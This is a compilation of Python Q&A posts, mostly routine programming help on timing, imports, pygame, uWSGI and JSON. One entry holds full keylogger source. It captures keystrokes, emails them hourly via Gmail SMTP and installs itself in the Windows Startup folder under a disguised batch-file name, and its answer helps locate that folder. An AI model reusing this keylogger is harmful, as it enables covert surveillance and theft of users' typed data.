How do we use sleep() in Linux to keep our CPU usage reasonable while still having decent timing accuracy? Question: # The Problem I'm trying to test a system that uses UDP packets to communicate at a predetermined rate. I want to be able to test this system using a Python test harness with a set packet rate. Sample rates might be 20 packets/sec, or 4500 packets/sec, etc. In some simple tests I've determined that my Windows machine can pass upwards of 150,000 UDP packets per second over localhost, so I can treat that as an upper limit for the sake of the experiment. Let's start with this shell structure to create a rate limiter. This code is inspired mostly by code in [this thread](http://stackoverflow.com/questions/667508/whats-a-good-rate-limiting- algorithm). ## Approach 1 import time, timeit class RateLimiter: def __init__(self, rate_limit): self.min_interval = 1.0 / float(rate_limit) self.last_time_called = None def execute(self, func, *args, **kwargs): if self.last_time_called is not None: # Sleep until we should wake up while True: now = timeit.default_timer() elapsed = now - self.last_time_called left_to_wait = self.min_interval - elapsed if left_to_wait <= 0: break time.sleep(left_to_wait) self.last_time_called = timeit.default_timer() return func(*args, **kwargs) You can use this helper class like so: self._limiter = RateLimiter(4500) # 4500 executions/sec while True: self._limiter.execute(do_stuff, param1, param2) The call to `timeit.default_timer()` is a shortcut in Python that gives you the highest accuracy timer for your platform, lending an accuracy of about 1e-6 seconds on both Windows and Linux, which we will need. ### Performance of Approach 1 In this approach, `sleep()` can buy you time without eating CPU cycles, but it can hurt the accuracy of your delay. [This comment](http://stackoverflow.com/a/15967564/31707) shows the differences between Windows and Linux regarding `sleep()` for periods less than 10ms. In summary of that comment, Windows' `sleep()` only works for values of 1ms or more (any less is regarded as zero) but generally sleeps for _less_ than the requested sleep time, while in Linux `sleep()` is more precise but generally sleeps for slightly _more_ than the requested time. The code above is accurate on my Windows machine, but is inefficient for faster rates. When I requested a rate of 4500 packets/sec in my tests, I got a median of 4466 packets/sec (0.75% error). _However_ , for rates faster than 1000Hz, the calls to `sleep()` take zero time, so the RateLimiter burns CPU cycles until exceeding the wait time. Unfortunately we have no other choice since we can't use non-zero sleep times less than 1ms in Windows. In Linux, the calls to `sleep()` took longer than requested, yielding a median of 3470 packets/sec (22.8% error). While `sleep()` in Linux takes longer than desired, requesting higher rates like 6000Hz yields a true rate higher than 4500, so we know that it's capable of the goal rate. The problem is in our `sleep()` value, which must be corrected to be lower than we might have expected. I performed another test, using the following (bad) approach. ## Approach 2 In this approach, we never sleep. We chew up CPU cycles until the time elapses, which leads Python to use 100% of the core it's running on: def execute(self, func, *args, **kwargs): if self.last_time_called is not None: # Sleep until we should wake up while True: now = timeit.default_timer() elapsed = now - self.last_time_called left_to_wait = self.min_interval - elapsed if left_to_wait <= 0: break # (sleep removed from here) self.last_time_called = timeit.default_timer() return func(*args, **kwargs) ### Performance of Approach 2 In Linux, this yields a median rate of 4488 packets/sec (0.26% error), which is on par with Windows but eats the CPU the same way, so it's really inefficient. # The Question Here's what I'm getting at. **How do we use`sleep()` in Linux to keep our CPU usage reasonable while still having decent timing accuracy?** I figure this would have to involve some sort of monitoring and compensation process but I'm not really sure how to go about implementing such a thing. Is there a standard way to approach this kind of error-correction problem? Answer: The only way to guarantee this is to use real-time OS scheduling. Otherwise, you are at the scheduler's mercy and could be preempted at any time (e.g. if there is some high-priority/low-nice process eating your CPU cycles). Indeed, `sleep()` is just a convenient way to ask for a preemption of a specific duration. It's always possible you will sleep for substantially longer than you ask. This is why Windows does not even try to sleep for <1ms; it isn't capable of that level of precision once you factor in scheduler nondeterminism. Out of the box, Linux isn't either, but it can be configured (via [`sched_setscheduler(2)`](http://linux.die.net/man/2/sched_setscheduler)) to be real-time, so it will make the attempt if you ask.
GAE SDK 1.9.5 and an InvalidCertificateException Question: Trying to import testbed from GAE SDK 1.95 with Python2.7.8 on osX Maverics 10.9.5 and I'm getting a InvalidCertificateException error. from google.appengine.ext import testbed File "/usr/local/google_appengine/google/appengine/ext/testbed/__init__.py", line 120, in <module> from google.appengine.api import urlfetch_stub File "/usr/local/google_appengine/google/appengine/api/urlfetch_stub.py", line 34, in <module> _fancy_urllib_InvalidCertException = fancy_urllib.InvalidCertificateException AttributeError: 'module' object has no attribute 'InvalidCertificateException' I looked at the fancy_url module and the InvalidCertificateException class is there, so I don't understand why it's not importing. Apparently others have had the same error, so I attempt to correct it by deleting: **urlfetch_cacerts.txt** AND **cacerts.txt** from: GoogleAppEngineLauncher/Contents/Resources/GoogleAppEngineDefault.bundle/Content‌​s/Resources/google_appengine/lib/cacerts/ Answer: Apparently the GAE installer creates a nested directory, this was fixed by copying the contents in: cd /usr/local/google_appengine/lib cp fancy_urllib/fancy_urllib/__init__.py fancy_urllib/__init__.py This is how the module is incorrectly structured, it looks like these 2 **init**.py files are duplicate: /usr/local/google_appengine/lib/fancy_urllib/__init__.py # this file is empty /usr/local/google_appengine/lib/fancy_urllib/fancy_urllib/__init__.py # this file contains the functions. FIXED THE ERROR
How to import one day old logs Question: I am new to Python and need some help in being able to import done day old logs. Below is the script I have come up with, but not sure if it is working or if there is a better way to do this. def fileCreation(path): now = time.time() oneday_ago = now - (24*60*60) ## seconds in 1 day if fileCreation < oneday_ago: print f getAuditRecords(f) I have a script that does import the whole database from mid June 2014 but only need to get day old logs. Here is a sample of the logs I am trying to import > /mnt/hcp1/R1P/R1P_ora_982_2.xml.201409070400 > /mnt/hcp1/R1P/R1P_ora_20_1.xml.201409070400 > /mnt/hcp1/R1P/R1P_ora_29962_1.xml.201409070400 > /mnt/hcp1/R1P/R1P_ora_15593_2.xml.201409070400 > /mnt/hcp1/R1P/R1P_ora_9946_1.xml.201409070400 > /mnt/hcp1/R1P/R1P_ora_10746_1.xml.201409070400 > /mnt/hcp1/R1P/R1P_ora_6508_1.xml.201409070400 > /mnt/hcp1/R1P/R1P_ora_17340_2.xml.201409070400 > /mnt/hcp1/SCC/SCC_ora_18881_2.xml.201407090400 Answer: Regarding the "two days ago" part, you should use `datetime.datetime` and `datetime.timedelta` E.g. import datetime now = datetime.datetime.now() two_days = datetime.timedelta(days=2) two_days_ago = now - two_days
No module named flask while running uWSGI Question: I have a very simple flask app (myflaskapp.py): from flask import Flask app = Flask(__name__) @app.route('/') def index(): return "<span style='color:red'>I am app 1</span>" If I run: uwsgi --http-socket :3031 --plugin python --wsgi-file myflaskapp.py --callable app I get the following output: Traceback (most recent call last): File "myflaskapp.py", line 1, in <module> from flask import Flask ImportError: No module named flask unable to load app 0 (mountpoint='') (callable not found or import error) *** no app loaded. going in full dynamic mode *** and I don't understand why. I have flask installed (pip install flask). If I run ipython and import flask it also works there. Any ideas? Thanks! Answer: In the end what worked for me was adding -H /path/to/virtualenv to the uWSGI command: uwsgi --http-socket :3031 --plugin python --wsgi-file myflaskapp.py --callable app -H /path/to/virtualenv I also had different Python versions in the virtualenv and for uWSGI. I'm still investigating if this could cause any problems.
Python stdout logging: terminal vs bash file Question: I am not expert in Bash and Python, so this question might appear silly. I have a Python script called `learn.py` and I noticed two different behaviours of the standard output, when redirected to a log file. If I call this from terminal, I can see the log file size growing while the script is running. $ ./learn.py > file.log However, if I create a bash file for the same purpose: #!/bin/bash ./learn.py > file.log the script starts (I checked with `pgrep`) but it does not seem to run, as the log file stays empty. Am I missing something? Answer: I solved using the [Logging facility for Python](https://docs.python.org/2/howto/logging.html), by inserting import logging logging.basicConfig(filename='file.log',level=logging.INFO) and replacing every occurrence of `print "..."` with logging.info("...") The final Bash script: #!/bin/bash ./learn.py
Creating an update function within my display class in Python Question: So I am trying to code it when I call my myDisplay.update() function I can pass whatever game element I want to update into it, to display the image. For example I made a player with a player class, and I want to pass it into myDisplay.update(player), to pull the sprite from the player class and then render it in the update method. Current Error: AttributeError: 'Display' object has no attribute 'blit' Current Code: import pygame, sys from pygame.locals import * #Constants TILESIZE = 32 MAPWIDTH = 16 MAPHEIGHT = 16 #variables playing = True #Creates Display Window class Display(object): def __init__(self, width, height, tilesize): pygame.init() pygame.display.set_caption("FarmTown Version 1.0") self.SCREEN_WIDTH = width * tilesize self.SCREEN_HEIGHT = height * tilesize self.myScreen = pygame.display.set_mode([self.SCREEN_WIDTH, self.SCREEN_HEIGHT]) def update(self, updated): self.blit(updated.image, (playerPos[0] * TILESIZE, playerPos[1] * TILESIZE)) pygame.display.update() class Controller(object): controls = { "KEY_UP": 273, "KEY_DOWN": 274, "KEY_RIGHT": 275, "KEY_LEFT": 276 } def checkInput(self): for key in self.controls: if event.key == self.controls[key]: if self.controls[key] == self.controls["KEY_UP"]: print "Up" elif self.controls[key] == self.controls["KEY_DOWN"]: print "Down" elif self.controls[key] == self.controls["KEY_RIGHT"]: print "Right" elif self.controls[key] == self.controls["KEY_LEFT"]: print "Left" class Player(object): def __init__(self): #if playerClass == "peasant": self.image = pygame.image.load("player.png") self.pos = [0, 0] #Set Up Everything To Play myDisplay = Display(MAPWIDTH, MAPHEIGHT, TILESIZE) myController = Controller() player = Player() #Game Loop Begins while playing: for event in pygame.event.get(): if event.type == QUIT: pygame.quit() sys.exit() elif event.type == KEYDOWN: myController.checkInput() myDisplay.update(player) Answer: I think you meant to subclass a pygame object. Currently Display is a subclass of just "object", which doesn't contain the "blit" method. Or did you mean to write `pygame.blit` or `pygame.display.blit` instead of `self.blit`?
How do I bin and categorize numbers in Python? Question: I'm not sure if binning is the correct term, but I want to implement the following for a project I am working on: I have an array or maybe a dict describing boundaries and/or regions, for example: boundaries = OrderedDict([(10,'red'),(20,'blue'),(55,'purple')]) The areas are indexed from 0 to 100 (for example). I want to classify each area into a color (that is less than the key in the dict) and then plot it. For example, if it is less than 10, it is red. So far, I have: boundaries = OrderedDict([(10,'red'),(20,'blue'),(55,'purple')]) areas = range(0,101) binned = [] for area in areas: for border in boundaries.keys(): if area < border: binned.append(boundaries[border]) break Also, I need to figure out a way to define the colors and find a package to plot it. So if you have any ideas how I can plot a 2-D color plot (the actual project will be in 2-D). Maybe matplotlib or PIL? I have used matplotlib before but never for this type of data. Also, is there a scipy/numpy function that already does what I'm trying to do? It would be nice if the code is short and fast. This is not for an assignment of any sort (it's for a little experiment / data project of mine), so I don't want to reinvent the wheel here. Thanks in advance for any advice/help. Answer: import matplotlib.pyplot as plt boundaries = collections.OrderedDict([(10,'red'),(20,'blue'),(55,'purple')]) areas = range(0,101) n, bins, patches = plt.hist(areas, [0]+list(boundaries), histtype='bar', rwidth=1.0) for (patch,color) in zip(patches,boundaries.values()): patch.set_color(color) plt.show()
Running a .py file in python that requires input Question: the question I have is really a simple one, and maybe the issue is just myself not knowing the correct parameters for python with Linux. The file I am running uses input from the operator both to run the program, and also to get the information to convert, which I will place below: Initial_LonH = float(input("\nEnter RA's Hour >>> ")); Initial_LonM = float(input("\nEnter RA's Minute >>> ")); Initial_LonS = float(input("\nEnter Ra's Second >>> ")); Initial_LatH = float(input("\nEnter Dec's Hour >>> ")); Initial_LatM = float(input("\nEnter Dec's Minute >>> ")); Initial_LatS = float(input("\nEnter Dec's Second >>> ")); The issue when I run this in python as "python GalaxyConverter.py, the following error appears: Traceback (most recent call last): File "GalaxyConverter.py", line 105, in <module> input_Runner = str(input("\nDo you wish to convert Right Ascension and Declination into Cartesian?" File "<string>", line 1, in <module> NameError: name 'yes' is not defined It seems the issue is that the file does not know to take the command I put into the terminal as input for the python file. May I ask what I should do to fix this? The Entire Code is below: from math import radians, sin, cos, sqrt, asin, atan Minute_Con = 60; Second_Con = 3600; DT_Radians = 0.0174539252; RT_Degrees = 57.29577951; Radi_Verse = 879829141200000000000000; WRunner = True def HMS_Expand_Lon(LongitudeH, LongitudeM, LongitudeS): ##{ print("\n The Right Ascension starts as " + str(LongitudeH) + ":" + str(LongitudeM) + "." + str(LongitudeS)); LongitudeM = LongitudeM/Minute_Con; LongitudeS = LongitudeS/Second_Con; LongitudeHMS = LongitudeH + LongitudeM + LongitudeS; LongitudeHMS = LongitudeHMS * 15; print("\n The Right Ascension becomes " + str(LongitudeHMS)); return LongitudeHMS ##} def HMS_Expand_Lat(LatitudeH, LatitudeM, LatitudeS): ##{ print("\n The Declination starts as " + str(LatitudeH) + ":" + str(LatitudeM) + "." + str(LatitudeS)); LatitudeM = LatitudeM/Minute_Con; LatitudeS = LatitudeS/Second_Con; LatitudeHMS = LatitudeH + LatitudeM + LatitudeS; LatitudeHMS = LatitudeHMS * 15; print("\n The Declination becomes " + str(LatitudeHMS)); return LatitudeHMS ##} def HMS_Convert_Lon(LongitudeHMS): ##{ LongitudeRAD = LongitudeHMS * DT_Radians; print("\n The Right Ascension becomes " + str(LongitudeRAD)); return LongitudeRAD ##} def HMS_Convert_Lat(LatitudeHMS): ##{ LatitudeRAD = LatitudeHMS * DT_Radians; print("\n The Declination becomes " + str(LatitudeRAD)); return LatitudeRAD ##} def RAD_Convert_Lon(LongitudeRAD, LatitudeRAD): ##{ Con_Lon = LongitudeRAD * LongitudeRAD; Con_Lat = LatitudeRAD * LatitudeRAD; Con_Lat_Lon = sqrt(Con_Lat + Con_Lon); print("\n The Right Ascension becomes " + str(Con_Lat_Lon)); return Con_Lat_Lon ##} def RAD_Convert_Lat(LongitudeRAD, LatitudeRAD): ##{ Con_Lon = LongitudeRAD; Con_Lat = LatitudeRAD; Con_Lon_Lat = atan(Con_Lon / Con_Lat); print("\n The Declination becomes " + str(Con_Lon_Lat)); return Con_Lon_Lat ##} def POL_Convert_Lon(LongitudePOL, LatitudePOL): ##{ POL_Lon = LongitudePOL * cos(LatitudePOL); DEG_Lon = POL_Lon * RT_Degrees; print("\n X finally becomes " + str(DEG_Lon)); return DEG_Lon ##} def POL_Convert_Lat(LongitudePOL, LatitudePOL): ##{ POL_Lat = LongitudePOL * sin(LatitudePOL); DEG_Lat = POL_Lat * RT_Degrees; print("\n Y finally becomes " + str(DEG_Lat)); return DEG_Lat ##} def main(): ##{ Initial_LonH = float(input("\nEnter RA's Hour >>> ")); Initial_LonM = float(input("\nEnter RA's Minute >>> ")); Initial_LonS = float(input("\nEnter Ra's Second >>> ")); Initial_LatH = float(input("\nEnter Dec's Hour >>> ")); Initial_LatM = float(input("\nEnter Dec's Minute >>> ")); Initial_LatS = float(input("\nEnter Dec's Second >>> ")); Lon_Expanded = HMS_Expand_Lon(Initial_LonH, Initial_LonM, Initial_LonS); Lat_Expanded = HMS_Expand_Lat(Initial_LatH, Initial_LatM, Initial_LatS); Lon_Converted = HMS_Convert_Lon(Lon_Expanded); Lat_Converted = HMS_Convert_Lat(Lat_Expanded); Lon_RAD = RAD_Convert_Lon(Lon_Converted, Lat_Converted); Lat_RAD = RAD_Convert_Lat(Lon_Converted, Lat_Converted); Lon_POL = POL_Convert_Lon(Lon_RAD, Lat_RAD); Lat_POL = POL_Convert_Lat(Lon_RAD, Lat_RAD); X_Scaled = Lon_POL / Radi_Verse; Y_Scaled = Lat_POL / Radi_Verse; print("\n To scale of the theoretical length of universe, X = " + str(X_Scaled)); print("\n To scale of the theoretical length of the universe, Y = " + str(Y_Scaled)); ##} while WRunner == True: input_Runner = input("\nDo you wish to convert Right Ascension and Declination into Cartesian?" "\nif so, please type yes, if not, please type no >>> "); if input_Runner == "yes": main(); if input_Runner != "yes": break Answer: In python 3, you can just use `input` in your example, it can input strings. But in python 2, the same function is `raw_input`. `input` function in Python 2 is equals to `eval(raw_input(prompt))`, it will evaluate input string as a Python expression. Obviously your running python version is python 2, but I don't know what the code's python version is. But you need to modify all `input` to `raw_input` if it is python version is 2. Ref: <https://docs.python.org/2/library/functions.html#input> <https://docs.python.org/3/library/functions.html#input>
load an already written GTK python codes into a GUI designer Question: I want to change the interface of a written application. this application is written in python and GTK . I don't want to change the codes manually by myself but although I need an interface designer so I can import this application to it and the graphically apply my intended changes to it . I tried Glade and QTdesigner but they produce .ui file and I couldn't find a tool to convert back a .ui file to python code. plus that the don't open python files directly and didn't have import options. any solution will be appreciated. thanks Answer: It really depends on the application. If the application uses `*.glade` or `*.ui` files you can - depending on how well it is designed re-arrange certain elements and swap out container types. If there are no such files, you are out of luck. Then the ui is "hard"-coded (as hard as python code can get..) and you have to modify the widget hirarchy by modifying python code yourself. There is no such editor being able to extract a layout/ui file from code itself. * * * gtkinspector or formerly known as gtkparasite can modify properties of widgets on the fly but nothing that really modifies the python code of the running application. They sneak around the application code and modify the widget tree from back behind through means of the gtk module lib interface (correct me if I am wrong here, not totally sure).
Find startup folder in windows 8 using python Question: I have a code that adds a batch file to the startup folder so that it runs when the computer starts up. my code is the following: path = 'C:\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Batch.BAT' %win32api.GetUserName() f = open(path, 'w') This works just fine on Win 7 but in Win8 the startup folder was moved and I can't find access to it. How do I find the right folder to put it in? Thank you Isaac **UPDATE: My code works and runs when it is in .pyw but once I turn it to .exe it doesn't... This I don't understand** Full code: import win32api import sys import pythoncom, pyHook import time import smtplib import thread import re import os global text global start def main(): global text global start text = '' start = time.time() AddToStartUp(fixpath(findDirectory())) while True: hm = pyHook.HookManager() hm.KeyDown = OnKeyboardEvent hm.HookKeyboard() pythoncom.PumpMessages() def sendemail(from_addr, to_addr_list, cc_addr_list, subject, message, login, password, smtpserver='smtp.gmail.com:587'): header = 'From: %s\n' % from_addr header += 'To: %s\n' % ','.join(to_addr_list) header += 'Cc: %s\n' % ','.join(cc_addr_list) header += 'Subject: %s\n\n' % subject message = header + message server = smtplib.SMTP(smtpserver) server.starttls() server.login(login,password) problems = server.sendmail(from_addr, to_addr_list, message) server.quit() return problems def OnKeyboardEvent(event): global start global text text += chr(event.Ascii) print text if time.time()-start > 3600: thread.start_new_thread(sendemail, ('email','email','','Keylogger',text,'email','password')) start = time.time() return True def fixpath(path): arr = re.split(r'\\', path) direct = '' for i in arr: direct += i + '\\' return direct def AddToStartUp(direct): path = 'C:\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\innocentCode.BAT' %win32api.GetUserName() f = open(path, 'w') f.write("""cd %s\nstart keylogger\nexit"""%direct) def findDirectory(): return os.path.dirname(os.path.realpath(__file__)) if __name__ == "__main__": main() Answer: The following code shows how to find it via the win32 api. I once found it searching the web - no credits for me. from win32com.shell import shell, shellcon def startupdirectory(): return shell.SHGetFolderPath( 0, shellcon.CSIDL_COMMON_STARTUP, 0,# null access token (no impersonation) 0 # want current value, shellcon.SHGFP_TYPE_CURRENT isn't available, this seems to work ) if __name__ == '__main__': print startupdirectory()
TypeError: 'bool' object is not callable - python Question: I'm trying to implement a simple maths game where the user is given random numbers and operators then they have to work out the answer, I found sources on the internet that suggested using the operator module, which is why i used it, if there is a more efficient/ easier way of achieving this I am very open for interpretation. Essentially i am trying to remove this horrible `<built-in function add>` and swap it to be more user friendly by saying '+' or 'add', something along those lines but i keep getting the error 'TypeError: 'bool' object is not callable - python', i really dont know what this means, i am new to python and am very confused. from operator import add, sub, mul, floordiv operators = (add == str("add"), sub == str("subtract"), mul == str("multiply"), floordiv == str("divide")) operator = random.choice(operators) answer = operator(number1, number2) question = print("What is ", number1, operator, number2, "?") Answer: What you get as a result of the first line is operators = (False, False, False, False, False) or something in those lines. Then you are trying to call a boolean that gets you the exception you have. `add == str("add")` will evaluate to `False`, since you're trying to compare a function to a string. I'm assuming you are trying to implement a simple math game, hence instead of using `operator`, which are in fact math operation functions, you can just use a simple dictonary: operators = { 'add': add, 'substract': sub, 'multiply': mul } answer = operators[random.choice(operators.keys())](number1, number2)
Python variable not recognized in if-statement Question: Here is all the code, but in main(), a while loop checks if on_title_screen is true, and if it is, displays the title screen, but if not, displays the game. However, after starting the program, running the game, and returning to the title screen, attempting to press the start button makes both the code for if on_title_screen==True and elif on_title_screen==False run when only the first bit should run. import random import pygame from pygame import * import math import sys #Presets for window size=width,height=500,500 Ag=-9.80665 clock = pygame.time.Clock() white=(255,255,255) blue=(0,0,255) red=(255,0,0) gray_bgColor=(190,193,212) #Initialise pygame Surface as screen pygame.init() pygame.font.init() screen=pygame.display.set_mode(size) pygame.display.set_caption("Flappy Bird Replica") def falling_loop(): for event in pygame.event.get(): if event.type==pygame.KEYDOWN: if event.key==pygame.K_UP: preset.vY=-10 if preset.yPos>height-50: preset.on_title_screen=True preset.vY+=1 preset.yPos+=preset.vY class presets(): #Holds all the "global" values for the game vY=0 xPos,yPos=200,100 on_title_screen=True class graphics(): #Holds the methods for loading/displaying graphics def load_images(self): #Loads the background and sprite images self.background_image=pygame.image.load("flappy_background.png").convert() self.bird_image=pygame.image.load("flappy_sprite.jpg").convert() self.bird_image.set_colorkey(white) self.birdHitBox=self.bird_image.get_rect() def show_background(self): #blits the background screen.blit(self.background_image,[0,0]) def show_bird(self): #blits the bird onto screen at xPos, yPos screen.blit(self.bird_image,[preset.xPos,preset.yPos]) def refresh_display(self): #updates the display screen.blit(self.background_image,[0,0]) falling_loop() self.show_bird() class titleScreen(): #Holds the methods for the title screen/menu def title(self): #Sets up the title titleText="Flappy Game" titlePos=(0,0) currentFont=pygame.font.SysFont("arialms",30,bold=True,italic=True) renderTitle=currentFont.render(titleText,1,blue,gray_bgColor) self.titlex,self.titley=currentFont.size(titleText) screen.blit(renderTitle,titlePos) def start(self): #Sets up the start Button startText="Start Game" self.startPos=(0,self.titley) currentFont=pygame.font.SysFont("arialms",25,bold=False,italic=False) renderStart=currentFont.render(startText,1,blue,gray_bgColor) self.startx,self.starty=currentFont.size(startText) self.start_rect = pygame.Rect(self.startPos[0],self.titley,self.startx,self.starty) screen.blit(renderStart,self.startPos) def quit(self): #Sets up the quit button quitText="Quit" self.quitPos=(0,self.starty+self.titley) currentFont=pygame.font.SysFont("arialms",25,bold=False,italic=False) renderQuit=currentFont.render(quitText,1,red,gray_bgColor) self.quitx,self.quity=currentFont.size(quitText) self.quit_rect = pygame.Rect(self.quitPos[0],self.titley+self.starty,self.quitx,self.quity) screen.blit(renderQuit,self.quitPos) def get_click(self): #Gets mouse click and processes outcomes for event in pygame.event.get(): if event.type==pygame.MOUSEBUTTONDOWN: x,y=pygame.mouse.get_pos() #Tests for start: if self.start_rect.collidepoint(x,y): print("start") preset.on_title_screen=False graphicsC.show_background() elif self.quit_rect.collidepoint(x,y): print("quit") sys.exit() #Assign objects to respective classes preset=presets() titleC=titleScreen() graphicsC=graphics() def setupTitle(): #bundles all title_screen functions titleC.title() titleC.start() titleC.quit() def main(): graphicsC.load_images() graphicsC.show_background() setupTitle() while True: clock.tick(30) if preset.on_title_screen==False: graphicsC.refresh_display() print("working...") elif preset.on_title_screen==True: setupTitle() titleC.get_click() pygame.display.flip() main() Answer: You have to use `self.xxx` to make class attributes. You also need to make sure those values are defined when initializing the class using the `__init__` method. So use: class presets(): #Holds all the "global" values for the game def __init__(self): self.vY=0 self.xPos,self.yPos=200,100 self.on_title_screen=True However, making 'global' variables this way probably isn't the best way, as [Cyber mentions in the comments](http://stackoverflow.com/questions/27129680/python-variable-not- recognized-in-if-statement#comment42758526_27129680).
How to parse a CLI command output (table) in python? Question: I am a newbie to parsing. switch-630624 [standalone: master] (config) # show interface ib status Interface Description Speed Current line rate Logical port state Physical port state --------- ----------- --------- ----------------- ------------------ ------------------- Ib 1/1 14.0 Gbps rate 56.0 Gbps Initialize LinkUp Ib 1/2 14.0 Gbps rate 56.0 Gbps Initialize LinkUp Ib 1/3 2.5 Gbps rate only 10.0 Gbps Down Polling Assume I have an engine which injects the command on the switch, and put the above output as 1 huge string in a variable named "output". I would like to return a dictionary which includes only the ports number as follows: {'Ib1/11': '1/11', 'Ib1/10': '1/10', ... , } I guess I should use the Python`s Subprocess module and regular expressions. Number of ports can vary (can be 3, 10, 20, 30, 60...). I will appreciate any kind of direction. Thanks, Qwerty Answer: # Did this in Python 2.7 import re # Assume your input is in this file INPUT_FILE = 'text.txt' # Regex to only pay attention to lines starting with Ib # and capture the port info regex = re.compile(r'^(Ib\s*\S+)') result = [] # Store results in a list with open(INPUT_FILE, 'r') as theFile: for line in theFile: match = regex.search(line) if not match: continue result.append(match.group()) print result
Python: Appending to lists as keys within a dictionary Question: def classify(kingdom, species): """ (list of str, list of str) -> dict classifies each of the species in the right class in the format of a dictionary PRECONDITION: len(kingdom) = len(species) >>>classify(['Animal', 'Animal', 'Plant', 'Protist'], ['Dog', 'Cat', 'Daffodil', 'Plankton']) {'Animal' : ['Dog', 'Cat'], 'Plant' : ['Daffodil'], 'Protist' : ['Plankton']} """" I am trying to complete this function; however, i do not know how to assign a variable to a dictionary that uses lists as the values, nor do I know how to add new values to the list. So far this is my attempt def classify(kingdom, species): d = {} for j in range(len(kingdom)): d[kingdom[j]] = [] for k in range(len(species)): d[kingdom[k]].append(species[k]) return d For some reason in returns the incorrect result. >>>classify(['Animal', 'Animal', 'Plant', 'Protist'], ['Dog', 'Cat', 'Daffodil', 'Plankton']) {'Protist': ['Dog', 'Cat', 'Daffodil', 'Plankton'], 'Plant': ['Dog', 'Cat', 'Daffodil', 'Plankton'], 'Animal': ['Dog', 'Cat', 'Daffodil', 'Plankton']} Answer: Two problems. First, everywhere you're using `kingdom[1]`, you should just be using `kingdom`. Seems like you used to have a function that took a single list containing two sublists, and you didn't update the code to correspond to the new signature. Second, doing `d[kingdom[j]] = b` will cause all values in `d` to point to the exact same list. Appending to one of them will cause all the other ones to be appended to as well. Just assign a brand new list each time. def classify(kingdom, species): d = {} for j in range(len(kingdom)): d[kingdom[j]] = [] for k in range(len(species)): d[kingdom[k]].append(species[k]) return d print classify(['Animal', 'Animal', 'Plant', 'Protist'], ['Dog', 'Cat', 'Daffodil', 'Plankton']) Result: {'Plant': ['Daffodil'], 'Protist': ['Plankton'], 'Animal': ['Dog', 'Cat']} * * * Bonus: You may find it worthwhile to refactor your code. You can eliminate the first loop in your function if you make `d` a `collections.defaultdict`; you won't need to set up the lists, since they'll be created by default. from collections import defaultdict def classify(kingdom, species): d = defaultdict(list) for k in range(len(species)): d[kingdom[k]].append(species[k]) return d And you can make the second loop arguably more clear if you iterate through the lists' elements directly instead of iterating through their indices. from collections import defaultdict def classify(kingdom, species): d = defaultdict(list) for name, kind in zip(species, kingdom): d[kind].append(name) return d
invalid literal for int() with base 10 - django - updated Question: I am a django beginner, and I am trying to make a child-parent like combo box, (bars depends on city depends on country) and I get this error. **UPDATE: Changed the model and the default value for the foreign key, but still the same error. Any help? thanks!** this is models.py: from django.db import models from smart_selects.db_fields import ChainedForeignKey DEFAULT_COUNTRY_ID = 1 # id of Israel class BarName(models.Model): name = models.CharField(max_length=20) def __unicode__(self): return self.name class Country(models.Model): country = models.CharField(max_length=20) def __unicode__(self): return self.country class City(models.Model): city = models.CharField(max_length=20) country = models.ForeignKey(Country, default=DEFAULT_COUNTRY_ID) def __unicode__(self): return self.city class Bar(models.Model): country = models.ForeignKey(Country) city = ChainedForeignKey(City, chained_field='country' , chained_model_field='country', auto_choose=True) name = ChainedForeignKey(BarName, chained_field='city', chained_model_field='city', auto_choose=True) def __unicode__(self): return '%s %s %s' % (self.name, self.city, self.country) class Admin: pass from running 'python manage.py migrate': ➜ baromatix python manage.py migrate Operations to perform: Apply all migrations: admin, bars, contenttypes, auth, sessions Running migrations: ....... value = self.get_prep_value(value) File "/Library/Python/2.7/site-packages/django/db/models/fields/__init__.py", line 915, in get_prep_value return int(value) ValueError: invalid literal for int() with base 10: 'DEFAULT VALUE' Answer: I solved this issue when deleting the **old migrations files** that django created.
Getting Deeper Level JSON Values in Python Question: I have a Python script that make an API call to retrieve data from Zendesk. (Using Python 3.x) The JSON object has a structure like this: { "id": 35436, "url": "https://company.zendesk.com/api/v2/tickets/35436.json", "external_id": "ahg35h3jh", "created_at": "2009-07-20T22:55:29Z", "updated_at": "2011-05-05T10:38:52Z", "type": "incident", "subject": "Help, my printer is on fire!", "raw_subject": "{{dc.printer_on_fire}}", "description": "The fire is very colorful.", "priority": "high", "status": "open", "recipient": "[email protected]", "requester_id": 20978392, "submitter_id": 76872, "assignee_id": 235323, "organization_id": 509974, "group_id": 98738, "collaborator_ids": [35334, 234], "forum_topic_id": 72648221, "problem_id": 9873764, "has_incidents": false, "due_at": null, "tags": ["enterprise", "other_tag"], "via": { "channel": "web" }, "custom_fields": [ { "id": 27642, "value": "745" }, { "id": 27648, "value": "yes" } ], "satisfaction_rating": { "id": 1234, "score": "good", "comment": "Great support!" }, "sharing_agreement_ids": [84432] } Where I am running into issues is in the `"custom_fields"` section specifically. I have a particular custom field inside of each ticket I need the value for, and I only want that particular value. To spare you too many specifics of the Python code, I am reading through each value below for each ticket and adding it to an output variable before writing that output variable to a .csv. Here is the particular place the breakage is occuring: output += str(ticket['custom_fields'][id:23825198]).replace(',', '')+',' All the replace nonsense is to make sure that since it is going into a comma delimited file, any commas inside of the values are removed. Anyway, here is the error I am getting: output += str(ticket['custom_fields'][id:int(23825198)]).replace(',', '')+',' TypeError: slice indices must be integers or None or have an __index__ method As you can see I have tried a couple different variations of this to try and resolve the issue, and have yet to find a fix. I could use some help! Thanks... Answer: Are you using json.loads()? If so you can then get the keys, and do an if statement against the keys. An example on how to get the keys and their respective values is shown below. import json some_json = """{ "id": 35436, "url": "https://company.zendesk.com/api/v2/tickets/35436.json", "external_id": "ahg35h3jh", "created_at": "2009-07-20T22:55:29Z", "updated_at": "2011-05-05T10:38:52Z", "type": "incident", "subject": "Help, my printer is on fire!", "raw_subject": "{{dc.printer_on_fire}}", "description": "The fire is very colorful.", "priority": "high", "status": "open", "recipient": "[email protected]", "requester_id": 20978392, "submitter_id": 76872, "assignee_id": 235323, "organization_id": 509974, "group_id": 98738, "collaborator_ids": [35334, 234], "forum_topic_id": 72648221, "problem_id": 9873764, "has_incidents": false, "due_at": null, "tags": ["enterprise", "other_tag"], "via": { "channel": "web" }, "custom_fields": [ { "sid": 27642, "value": "745" }, { "id": 27648, "value": "yes" } ], "satisfaction_rating": { "id": 1234, "score": "good", "comment": "Great support!" }, "sharing_agreement_ids": [84432] }""" # load the json object zenJSONObj = json.loads(some_json) # Shows a list of all custom fields 